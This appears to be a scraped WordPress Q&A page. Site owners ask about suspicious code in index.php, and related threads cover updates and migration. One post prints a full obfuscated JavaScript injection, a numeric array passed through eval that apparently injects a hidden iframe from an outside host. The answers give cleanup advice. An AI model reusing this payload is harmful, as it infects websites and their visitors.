WordPress website's index.php show unusual code - wordpress
I was cleaning my hacked WordPress website and I found unusual code in index.php.
Is this the code used to hack my website? Or does it come from a plugin?
Your site is hacked.
I would use wp migrate DB to make a copy of the database, reinstall a fresh version of wordpress and all your plugins.
Related
Can i update wordpress version of my PHP5 customised wordpress site into latest wordpress version?
Can i update wordpress version of my PHP5 customised wordpress site into latest wordpress version? Now it is in 4.6 and i want to move it to 4.9.1. Any issues will be rised?
You can do it and mostly that will not cause any of issue. But before do WordPress update make sure you have to take backup for your databases once. First of all take backup for database and make your full theme folder backup and store it as a zip , so if any issue will be raised then you directly unzip that as a theme and that will work fine. If you have do your WordPress customization all in function.php file then your new WordPress will work perfect with your changes. If your site have Woocomerce or other more useful plugin for front site then you should take backup for that also. After WordPress update you may be find plugin update so do it one by one.
Wordpress update to 4.7 causes Magento/Fishpig integration to redirect base URL to the Wordpress folder
I've copied a live site to a test server to test updating Wordpress on a Magento site that uses Fishpig to bridge content from Wordpress to Magento. Since the udpate, the site always redirects from the homepage to the wordpress folder. e.g. dev.site.com goes to dev.site.com/wordpress. It's not an .htaccess issues, if I wipe them out in both directories it still does it, if I rename index.php in the wordpress folder it stops it but breaks the preview. If I rename the theme and plugins folders it still redirects, something in the core is causing it but I am having issues figuring out what it is. Thanks. Also if I change the site to show the latest blog post instead of the static home page, it doesn't redirect but shows the blog page.
We will need more information to help solve your problem. Are your FishPig extensions at the latest version? What FishPig add-on extensions, if any, are you using? Have you tried disabling all WordPress plugins? Do you have any error messages in System > Configuration > WordPress? My guess is that your WordPress URLs aren't setup correctly and you're using an out dated add-on extension (eg. Visual Composer). There was a bug in older versions of some add-ons that caused this issue, but this has now been fixed. If you can provide the actual link to your dev site, it will make debugging the issue much easier.
WordPress images and pages broken after host migration
I have created a WordPress site (my first) but since moving the site to a new domain all the images and pages/posts are broken and return a 404 error. Ive ran search and replace but it doesn't seem to have worked. www.phoenixworldwideent.com
Manual website migration is very difficult to do. So you can transfer your website in few minutes without any issues using duplicator plugin. you just need to installed the plugin and followed the installation wizard. you can read or watch step by step video tutorial HOW TO CLONE WEBSITE TO NEW HOST USING WORDPRESS DUPLICATOR
Go to your dashboard, log in, go to settings. Change the following: Site Address Wordpress Address Save. That should work.
did you try save permalinks some times the problem happen because permalinks need update other point if you can go to old site and use this plugin to move your site agin https://wordpress.org/plugins/duplicator/
It turns out there were some issues with the httpd.conf file and httpaccess files. The permalinks and database details were correct. I got this outsourced in the end so not 100% sure what the issue was but I shall update this post with more info when I get it :)
Get working dir from wordpress.com site
I'm not a WordPress expert here but I got a account and a preminum version with a template but I want to download the entire directory so I can modify php files, styles etc. How do I do this and also how do I upload it to the wordpress site itself since it's live. Thanks
Unfortunately, you cannot do that on wordpress.com site. But you can edit some files from within your wordpress admin panel editor.
js at beginning of my index.php in wordpress
I got a headers error and while investigating I found this at the beginning of my index.php both in the root index and in wp-admin. Clam-AV scan found no viruses. <script>if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';f+='Code';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[/* lots of numbers here, moved below for security */];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+n[j]));}q=ss;e(q);</script> The numbers: 3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,48,55.5,49,52,56,54.5,54.5,58,22,25,55,57.5,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,48,55.5,49,52,56,54.5,54.5,58,22,25,55,57.5,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5 EDIT: I've commented out the javascript since it was triggering my Eset AV: JS/Iframe.BQ trojan.
I had the Exact same things. Turns out there was a new plugin installed that I did not install. wp-content/plugins/ToolsPack/ToolsPack.php Make sure you do a clean install of WP and re-install all the plugins you were using minus this one. :) Bad stuff.
You got hacked. Clam AV doesn't scan your web hosting account nor your localhost server, if you are using one. Check your site with http://sitecheck.sucuri.net/scanner/ See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex. Tell your web host. Change all passswords.